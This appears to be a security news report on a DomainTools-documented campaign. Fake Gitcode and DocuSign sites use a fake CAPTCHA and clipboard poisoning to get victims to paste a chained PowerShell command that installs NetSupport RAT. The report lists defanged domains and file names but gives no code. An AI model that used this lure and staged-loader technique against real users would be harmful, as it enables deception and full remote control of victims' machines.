
Researchers from the DomainTools team have reported a new malicious campaign that leverages counterfeit websites masquerading as popular platforms such as Gitcode and DocuSign. The objective is to deceive users into manually executing a PowerShell script that installs the remote administration tool NetSupport RAT on the victim’s machine.
The attack begins when a user visits a fraudulent site designed to mimic a legitimate service. The site displays a CAPTCHA prompt, urging the visitor to complete what appears to be a routine verification process. Unbeknownst to the user, a PowerShell command is silently copied to the system clipboard—a technique known as clipboard poisoning. The user is then presented with simple instructions: open the Run dialog (“Win + R”), paste the contents (“Ctrl + V”), and press Enter. This method is referred to as “ClickFix.”
Upon execution, the script initiates a cascading sequence of malicious downloads. It starts with a loader that fetches an intermediate script from the external domain tradingviewtool[.]com
. This script then employs PowerShell to download an additional executable file, wbdims.exe
, from GitHub. This file ensures persistence by executing malicious code every time the user logs into the system. It establishes a connection with the command-and-control server docusign.sa[.]com
, triggering the retrieval of further payloads and rendering content through parameterized URLs.
The final stage of the attack involves downloading a ZIP archive containing the executable jp2launcher.exe
. Once launched, it installs NetSupport RAT—a legitimate remote administration tool long repurposed by cybercriminal groups for full-spectrum control over compromised systems. Among the threat actors utilizing this tool are FIN7, Scarlet Goldfinch, and Storm-0408.
What sets this campaign apart is its multi-layered PowerShell script chain, where each script retrieves and launches the next. This approach complicates early detection, enhances resilience against analysis and removal, and increases the attack’s overall stealth.
DomainTools also noted that the domain structure and malware delivery mechanisms closely resemble those used in the SocGholish campaign (also known as FakeUpdates). Both operations share similar social engineering tactics, domain registration patterns, and infection vectors.
Current evidence suggests that links to these spoofed websites are being disseminated via email and social media platforms, where adversaries entice users to click and unwittingly execute harmful actions on their devices.
NetSupport RAT remains a favored tool among cybercriminals due to its comprehensive control capabilities, including screen recording, file transfers, remote command execution, and access to sensitive information.